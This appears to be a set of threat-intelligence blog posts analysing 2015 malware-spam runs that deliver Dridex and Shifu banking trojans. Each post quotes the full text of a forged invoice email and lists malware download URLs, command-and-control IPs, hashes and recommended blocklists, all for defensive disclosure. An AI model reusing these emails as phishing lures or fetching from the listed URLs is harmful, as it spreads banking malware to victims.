buzmenajerlik.com.tr/65y3fd23d/87i4g3d2d2.exe
irisbordados.com/65y3fd23d/87i4g3d2d2.exe

This executable has a detection rate of 4/52 and according to that VT report and this Malwr report there is network traffic to:

157.252.245.32 (Trinity College Hartford, US)
89.32.145.12 (Elvsoft SRL, Romania / Coreix, UK)

Interesting, if you look at the Hybrid Analysis report and others, the executable masquerades as mbar.exe / Malwarebytes Anti-Rootkit. The payload is most likely to be the Dridex banking trojan.

Recommended blocklist:
157.252.245.32
89.32.145.12

MD5s:
ee5be0095669fb4456d2643359a174be
236244800e8f00d98a30d7d073ca3b41
e5413387decf22d3dfe3c899e43e6c25
e23b22e8bf2c97dbadd4eaa1e4e6fa21
4bd1b0bcc9bbf1889ccbd0ca0f82d5b5

Malware spam: "Invoice SI823610 from OfficeFurnitureOnline.co.uk Order Ref 4016584" / "accounts@equip4work.co.uk"

This fake invoice does not come from OfficeFurnitureOnline.co.uk but is instead a simple forgery with a malicious attachment.

From     accounts [accounts@equip4work.co.uk]
Date     Wed, 11 Nov 2015 14:54:33 +0400
Subject     Invoice SI823610 from OfficeFurnitureOnline.co.uk Order Ref 4016584

Please find attached a sales invoice from OfficeFurnitureOnline.co.uk.

This email address is only for account enquiries, please check your confirmation
for any information regarding the order details or delivery lead times.

Thank you for your order.

Attached is a file SI823610.XLS which I have seen only one version of in several samples of the email. Usually there are different variants. In this case, the spreadsheet contains this malicious macro [pastebin] and has a VirusTotal score of 4/54. According to this Hybrid Analysis report it then downloads a malicious binary from:

kdojinyhb.wz.cz/87yte55/6t45eyv.exe

In turn, this binary has a detection rate of zero. Those two reports plus this Malwr report show between them malicious traffic to the following IPs:

95.154.203.249 (Iomart / Rapidswitch, UK)
182.93.220.146 (Ministry Of Education, Thailand)
89.32.145.12 (Elvsoft SRL / Coreix , Romania / UK)

The payload is the Dridex banking trojan.

Recommended blocklist:
95.154.203.249
182.93.220.146
89.32.145.12
wz.cz

MD5s:
37ceca4ac82d0ade9bac811217590ecd
01638daf6dfb757f9a27b3e8124b3324

Malware spam: "INVOICE FOR PAYMENT - 7500005791" / "Whitehead, Lyn [Lyn.Whitehead@lancashire.pnn.police.uk]"

This fake financial spam is not from Lancashire Police but is a simply forgery with what appears to be a malicious attachment.

From:    Whitehead, Lyn [Lyn.Whitehead@lancashire.pnn.police.uk]
Date:    21 October 2015 at 10:15
Subject:    INVOICE FOR PAYMENT - 7500005791

Hello

Please find attached an invoice that is now due for payment.

Regards

Lyn

Lyn Whitehead (10688)
Business Support Department - Headquarters

Email: Lyn.Whitehead@lancashire.pnn.police.uk

********************************************************************************************

This message may contain information which is confidential or privileged. If you are not the intended recipient, please advise the sender immediately by reply e-mail and delete this message and any attachments, without retaining a copy.

Lancashire Constabulary monitors its emails, and you are advised that any e-mail you send may be subject to monitoring.

This e-mail has been scanned for the presence of computer viruses.

******************************************************************************************** 

The attachment appears contain some sort of malicious OLE object rather than a macro, but so far I have not been able to analyse it. Furthermore, this document does not seem to open properly in other applications, so I suspect that it contains an unknown exploit. Analysis is still pending.

The VirusTotal report shows a detection rate of zero. The Malwr report is inconclusive.

Other analysis is pending please check back.

UPDATE 1:
Another version of this is in circulation, also with zero detections at VirusTotal.  The Hybrid Analysis for both samples in inconclusive [1] [2].

UPDATE 2:
An analysis of the documents shows an HTTP request to:

ip1.dynupdate.no-ip.com:8245

All this returns is the IP address of the computer opening the document. Although not malicious in itself, you might want to look out for it as an indicator of compromise.

UPDATE 3:
All the attachments I have seen so far are corrupt, with an extra byte at the beginning (thanks). If you opened it and got a screen like this:

Source: Malwr.com

..then you are not infected. Incidentally, this only infects Windows PCs anyway.

The "fixed" malicious documents have a detection rate of about 6/56 [1] [2] [3] - analysis of these documents is pending, although I can tell you that they create a malicious file in %TEMP%\HichAz2.exe.

UPDATE 4:
The Hybrid Analysis reports for the documents can be found here [1] [2] [3] show that the macros [example] in the document download a binary from the following locations:

www.sfagan.co.uk/56475865/ih76dfr.exe
www.cnukprint.com/56475865/ih76dfr.exe
www.tokushu.co.uk/56475865/ih76dfr.exe
www.gkc-erp.com/56475865/ih76dfr.exe

At present this has a zero detection rate at VirusTotal (MD5 7f0076993f2d8a4629ea7b0df5b9bddd). Those reports in addition to this Malwr report indicate malicious traffic to the following IPs:

89.32.145.12 (Elvsoft SRL, Romania / Coreix Ltd, UK)
119.47.112.227 (Web Drive Ltd, New Zealand)
195.154.251.123 (Online SAS / Iliad Entreprises / Poney Telecom, France)
157.252.245.49 (Trinity College Hartford, US)

The payload is probably the Shifu banking trojan.

Recommended blocklist:
89.32.145.12
119.47.112.227
195.154.251.123
157.252.245.49

Malware spam: "[Scan] 2015-10-14 5:29:54 p.m." / "Ray White [rw@raylian.co.uk]"

This rather terse spam email has a malicious attachment. It does not come from Raylian but is instead a simple forgery.

From     Ray White [rw@raylian.co.uk]
Date     Thu, 15 Oct 2015 10:56:35 +0200
Subject     [Scan] 2015-10-14 5:29:54 p.m.

Amanda's attached.

In the only sample I saw, the attachment was named 2015-10-14 5-29-54 p.m..doc which has a VirusTotal detection rate of 4/56 and which contains this malicious macro [pastebin] . The Hybrid Analysis report shows this particular version (there will be others) downloading a binary from:

sdhstribrnalhota.xf.cz/86575765/6757645.exe

Despite the apparently random name, this is a real business website (SDH Stříbrná Lhota) that has been compromised. This binary has a detection rate of just 2/56 and is saved as %TEMP%\CrowSoft1.exe. The Hybrid Analysis report for this indicates connections to:

89.32.145.12 (Elvsoft SRL, Romania / Coreix, UK)
195.154.251.123 (Online SAS / Iliad Entreprises / Poney Telecom, France)

The payload appears to be the Dridex banking trojan, still going strong despite reports of arrests in the crime gang responsible.

Recommended blocklist:
89.32.145.12
195.154.251.123

MD5s:
30e1ad13b091ec24935724ed0abf62ca
bc571b3cfa8902da248420ba5e765a40

Malware spam: "Water Services Invoice" / "UUSCOTLAND@uuplc.co.uk"

(Note, an updated version of this spam run happened on 22nd October)

This fake financial email is not from United Utilities but is instead a simple forgery with a malicious attachment:

From     "UUSCOTLAND" <UUSCOTLAND@uuplc.co.uk>
Date     Mon, 12 Oct 2015 17:12:12 +0530
Subject     Water Services Invoice

Good Morning,

I hope you are well.

Please find attached the water services invoice summary for the billing period of
12 September 2015 to 12 October 2015.

If you would like any more help, or information, please contact me on 0345 0726077.
Our office is open between 9.00am and 5.00pm Monday to Friday. I will be happy to
help you. Alternatively you can email me at uuscotland@uuplc.co.uk<mailto:uuscotland@uuplc.co.uk>.

Kind regards

Melissa

Melissa Lears
Billing Specialist
Business Retail
United Utilities Scotland
T: 0345 0726077 (26816)
Melissa.lears@uuplc.co.uk<mailto:Melissa.lears@uuplc.co.uk>
Unitedutilitiesscotland.com


EMGateway3.uuplc.co.uk made the following annotations
---------------------------------------------------------------------
The information contained in this e-mail is intended only
for the individual to whom it is addressed. It may contain
legally privileged or confidential information or otherwise
be exempt from disclosure. If you have received this Message
in error or there are any problems, please notify the sender
immediately and delete the message from your computer. You
must not use, disclose, copy or alter this message for any
unauthorised purpose. Neither United Utilities Group PLC nor
any of its subsidiaries will be liable for any direct, special,
indirect or consequential damages as a result of any virus being
passed on, or arising from the alteration of the contents of
this message by a third party.

United Utilities Group PLC, Haweswater House, Lingley Mere
Business Park, Lingley Green Avenue, Great Sankey,
Warrington, WA5 3LP
Registered in England and Wales. Registered No 6559020

www.unitedutilities.com
www.unitedutilities.com/subsidiaries

Attached to the email is a file 12 October 2015 Invoice Summary.doc which comes in at least four different versions (VirusTotal results: [1] [2] [3] [4]) which contain a macro that looks like this example. Download locations spotted so far are:

ukenterprisetours.com/877453tr/rebrb45t.exe
eventmobilecatering.co.uk/877453tr/rebrb45t.exe
thewimbledondentist.co.uk/877453tr/rebrb45t.exe
cardiffhairandbeauty.co.uk/877453tr/rebrb45t.exe

All those download locations are on UK sites, but there are three apparently unrelated IP addresses in use:
46.20.120.64
109.108.129.21
213.171.218.221

This is saved as %TEMP%\gicage.exe and has a VirusTotal detection rate of just 1/56.  That VirusTotal report and this Malwr report indicate traffic to:

149.210.180.13 (TransIP BV, Netherlands)
86.105.33.102 (Data Net SRL, Romania)

I would recommend blocking traffic to both those IPs. The payload is the Dridex banking trojan.

Recommended blocklist:
149.210.180.13
86.105.33.102

MD5s:
6a95b030e91e804f73d14d14cb26e884
04e1476d464fafa559bd1bd8ea38749c
f7389b47c3dbe57f24dafb3b9a7818a2
b4b7a46938f9965169ca1dad29d2d8fc
40d4c1771caba32a2a25e4236f80b548